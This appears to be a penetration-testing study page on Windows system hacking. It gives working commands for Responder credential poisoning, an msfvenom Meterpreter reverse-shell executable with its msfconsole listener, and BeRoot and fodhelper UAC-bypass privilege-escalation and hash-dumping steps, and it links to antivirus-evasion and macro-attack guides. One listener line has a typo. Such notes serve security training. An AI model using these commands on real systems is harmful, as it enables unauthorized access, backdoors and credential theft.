# System Hacking

<figure><img src="https://img.freepik.com/premium-photo/attacked-hacked-system-system-hacking-concept-hacked-system-warning-threat-3d-render-illustration_507676-435.jpg" alt=""><figcaption></figcaption></figure>

## Introduction

System hacking is defined as the **compromise between computer systems and software to access the target computer and steal or misuse its sensitive information**. The malware and the attacker identify and exploit the vulnerability of the computer system to gain unauthorized access.

#### Steps involved in System Hacking

1. Gaining Access
2. Escalation Privileges
3. Maintaining Access
4. Clearing Logs

## NTLM

Windows New Technology LAN Manager (NTLM) is a suite of security protocols offered by Microsoft to authenticate users' identities and protect the integrity and confidentiality of their activity.

{% embed url="<https://medium.com/@petergombos/lm-ntlm-net-ntlmv2-oh-my-a9b235c58ed4>" %}
This Medium Post might give you an idea about NTLM Hashes
{% endembed %}

### Responder

Responder is an LLMNR, NBT-NS, and MDNS poisoner. It will answer *specific* NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: <http://support.microsoft.com/kb/163409>). By default, the tool will only respond to File Server Service requests, which are for SMB.

The concept behind this is to target our answers and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behaviour. You can set the -r option via the command line if you want to answer the Workstation Service request for a name suffix.

{% embed url="<https://github.com/SpiderLabs/Responder>" %}

{% embed url="<https://medium.com/mii-cybersec/gaining-credentials-easily-with-responder-tool-b821f33e342b>" %}
This migh be useful! Give a read
{% endembed %}

```
chmod +x Responder.py
sudo ./Responder.py -I eth0
Responder.py -I eth0 -dwrv
```

### Cracking NTLM Hash using John-The-Ripper

John the Ripper is a free, open-source password cracking and recovery security auditing tool available for most operating systems. It has a bunch of passwords in both raw and hashed format. Now to crack the password, John the Ripper **will identify all potential passwords in** a hashed format.

{% embed url="<https://github.com/openwall/john>" %}

{% file src="<https://1680260334-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fuyv6WKxbnPSm2zlRacJi%2Fuploads%2FUnh5hSI3XQ9mYwcSWZGB%2Fjtr-cheat-sheet.pdf?alt=media&token=ebbe874f-2490-4ae2-a362-be2dc121e648>" %}
<https://countuponsecurity.files.wordpress.com/2016/09/jtr-cheat-sheet.pdf>
{% endfile %}

{% embed url="<https://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats>" %}

## Backdoor Using Metasploit

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. It is owned by Boston, Massachusetts-based security company Rapid7.

#### Crafting Windows executable through MSFVenom

```
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=YOUR-IP-ADDRESS LPORT=ANY-FREE-PORT -o /root/Desktop/virus.exe
```

#### Setting up reverse listener using msfconsole

```
msfconsole -q
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST YOUR-IP-ADDRESS
ser RPORT ANY-FREE-PORT
exploit
```

## PowerSploit

PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts:

{% embed url="<https://github.com/PowerShellMafia/PowerSploit>" %}

#### Must Read this tutorial&#x20;

{% embed url="<https://null-byte.wonderhowto.com/how-to/hack-like-pro-use-powersploit-part-1-evading-antivirus-software-0165535>" %}

## Armitage

*Armitage* is a fantastic Java-based GUI front-end for the Metasploit Framework developed by Raphael Mudge. Its goal is to help security professionals better understand hacking and help them realize the power and potential of Metasploit.

![Armitage screenshot](https://thehackernews.com/images/_bCYQxIvMQ2U/TPN6QXQdF3I/AAAAAAAAAKo/OQe_incImJU/w0/armitage4.png)

{% embed url="<https://github.com/r00t0v3rr1d3/armitage>" %}
[ Armitage Homepage](https://github.com/r00t0v3rr1d3/armitage)
{% endembed %}

## Hacking Microsoft office with Macro

{% embed url="<https://www.yeahhub.com/exploit-windows-malicious-ms-office-file-metasploit-framework>" %}

## Privesc Windows Machine using BeRoot

BeRoot Project is a post-exploitation tool to check common misconfigurations to find a way to escalate our privilege. It has been added to the [pupy](https://github.com/n1nj4sec/pupy/) project as a post-exploitation module (so it will be executed in memory without touching the disk). This tool does not realize any exploitation. Its main goal is not to realize a configuration assessment of the host (listing all services, all processes, all network connections, etc.) but to print only information that has been found as a potential way to escalate our privilege.

{% embed url="<https://github.com/AlessandroZ/BeRoot>" %}

#### Steps you can replicate

1. Upload the BeRoot.exe into the Machine through Reverse Shell
2. Interact to the win shell.
3. BeRoot.exe
4. Run post/windows/gather/smart\_hashdump
5. to get System prev to try to use "getsystem -t 1" If it responds negative then follow the next step
6. Let's try another exploit. "use exploit/windows/local/bypassuac\_fodhelper" and set the session into that exploit.
7. After exploit try to run "getuid" "getsystem -t 1" "getuid"
8. Run post/windows/gather/smart\_hashdump

#### Other Methodology:

{% embed url="<https://medium.com/@tommelo/bypassing-windows-10-uac-with-python-aed3c835c4f0>" %}

{% embed url="<https://www.hackingarticles.in/bypass-uac-protection-remote-windows-10-pc-via-fodhelper-registry-key/>" %}
